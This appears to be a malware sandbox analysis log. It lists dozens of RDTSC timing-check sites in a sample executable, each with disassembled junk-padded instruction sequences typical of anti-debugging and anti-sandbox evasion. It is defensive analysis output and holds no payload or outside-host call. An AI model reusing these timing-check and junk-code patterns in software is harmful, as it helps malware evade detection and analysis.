                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0A1A second address: AE0A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FA934C8B333h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FA934C8B326h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0A3D second address: AE0A60 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FA9347D66C2h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0A60 second address: AE0A64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0A64 second address: AE0A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C00E second address: A2C018 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA934C8B326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8876 second address: AE887D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE887D second address: AE8899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA934C8B338h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8899 second address: AE8902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FA9347D66CDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f js 00007FA9347D66C7h 0x00000015 jmp 00007FA9347D66BFh 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d jmp 00007FA9347D66C3h 0x00000022 ja 00007FA9347D66B6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b jmp 00007FA9347D66BBh 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8902 second address: AE8906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8A83 second address: AE8A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF358E second address: AF359D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA934C8B326h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9FE1 second address: AF9FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9FE5 second address: AF9FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9FE9 second address: AF9FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA9347D66BBh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9FFA second address: AFA019 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA934C8B335h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D51F second address: B0D542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 pushad 0x00000008 jmp 00007FA9347D66BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BE3C second address: B0BE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a jng 00007FA934C8B326h 0x00000010 ja 00007FA934C8B326h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BFBF second address: B0BFEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C3h 0x00000007 push edi 0x00000008 jo 00007FA9347D66B6h 0x0000000e js 00007FA9347D66B6h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jns 00007FA9347D66B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BFEF second address: B0BFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C16F second address: B0C173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C173 second address: B0C179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C179 second address: B0C189 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA9347D66C2h 0x00000008 jc 00007FA9347D66B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C480 second address: B0C48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FA934C8B326h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C48F second address: B0C4B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA9347D66CBh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C4B0 second address: B0C4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B336h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C4CC second address: B0C4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C4D0 second address: B0C4D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11819 second address: B1181E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1181E second address: B1182A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FA934C8B326h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1182A second address: B1183E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA9347D66B6h 0x0000000e jnc 00007FA9347D66B6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1183E second address: B1184A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1199A second address: B119A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B119A0 second address: B119AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14ADA second address: B14AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14AE0 second address: B14AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14AE7 second address: B14B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA9347D66C5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B324FD second address: B32503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34CDB second address: B34CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34CE1 second address: B34CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E85E second address: B4E87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA9347D66B6h 0x0000000a jmp 00007FA9347D66C2h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E87A second address: B4E887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FA934C8B326h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EA10 second address: B4EA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50380 second address: B503D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FA934C8B32Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007FA934C8B335h 0x00000018 jmp 00007FA934C8B334h 0x0000001d pop esi 0x0000001e jmp 00007FA934C8B32Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007FA934C8B32Dh 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B503D9 second address: B503DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52F57 second address: B52F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53307 second address: B53348 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA9347D66BAh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007FA9347D66BDh 0x00000012 pop ebx 0x00000013 nop 0x00000014 push edx 0x00000015 mov dword ptr [ebp+122D34A6h], edi 0x0000001b pop edx 0x0000001c push dword ptr [ebp+122D195Ah] 0x00000022 mov edx, ebx 0x00000024 push 7B3C172Fh 0x00000029 jc 00007FA9347D66C0h 0x0000002f pushad 0x00000030 push esi 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B546BC second address: B546CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56505 second address: B56525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA9347D66C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56525 second address: B5652D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5652D second address: B5653A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FA9347D66B6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480191 second address: 54801D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA934C8B32Ch 0x00000011 sbb ch, FFFFFFE8h 0x00000014 jmp 00007FA934C8B32Bh 0x00000019 popfd 0x0000001a movzx eax, di 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54801D7 second address: 54801DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54801DB second address: 54801DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54801DF second address: 54801E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54801E5 second address: 5480247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 movzx eax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dl, 4Ah 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 push ecx 0x00000017 pushfd 0x00000018 jmp 00007FA934C8B335h 0x0000001d sub al, 00000016h 0x00000020 jmp 00007FA934C8B331h 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA934C8B339h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480247 second address: 548025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548025C second address: 5480262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470056 second address: 547005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547005A second address: 5470060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470060 second address: 5470071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470071 second address: 5470075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470075 second address: 54700A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA9347D66BCh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA9347D66C7h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54400C8 second address: 54400CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54400CE second address: 5440102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e push edi 0x0000000f mov al, 45h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA9347D66C3h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440102 second address: 5440106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440106 second address: 544010C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544010C second address: 5440154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B332h 0x00000009 or cx, 1DF8h 0x0000000e jmp 00007FA934C8B32Bh 0x00000013 popfd 0x00000014 mov di, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FA934C8B332h 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440154 second address: 5440171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54401CA second address: 54401CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54401CF second address: 54401F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA9347D66BAh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54401F8 second address: 5440207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460C82 second address: 5460C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460C87 second address: 5460CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA934C8B337h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460CA2 second address: 5460D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA9347D66C3h 0x00000015 xor eax, 5A6CAEAEh 0x0000001b jmp 00007FA9347D66C9h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FA9347D66C0h 0x00000027 jmp 00007FA9347D66C5h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460D21 second address: 5460D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460D27 second address: 5460D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460D2B second address: 5460D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460D2F second address: 5460DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA9347D66C4h 0x00000010 xor cx, F5B8h 0x00000015 jmp 00007FA9347D66BBh 0x0000001a popfd 0x0000001b pushad 0x0000001c call 00007FA9347D66C6h 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 mov esi, edi 0x0000002a pushfd 0x0000002b jmp 00007FA9347D66C9h 0x00000030 sub ecx, 001321B6h 0x00000036 jmp 00007FA9347D66C1h 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460DBA second address: 5460DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460DBE second address: 5460DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54607D3 second address: 546086E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA934C8B32Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FA934C8B331h 0x00000016 call 00007FA934C8B330h 0x0000001b mov eax, 7BFBD8B1h 0x00000020 pop ecx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FA934C8B333h 0x0000002a sub ch, 0000001Eh 0x0000002d jmp 00007FA934C8B339h 0x00000032 popfd 0x00000033 mov di, ax 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a mov dx, cx 0x0000003d mov al, 2Bh 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA934C8B32Ah 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546086E second address: 5460880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460880 second address: 5460884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460738 second address: 5460748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460748 second address: 546077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FA934C8B336h 0x00000015 adc ch, FFFFFFD8h 0x00000018 jmp 00007FA934C8B32Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546077E second address: 5460784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460784 second address: 5460788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460478 second address: 546049C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e mov eax, ebx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 movsx ebx, ax 0x00000018 rdtsc
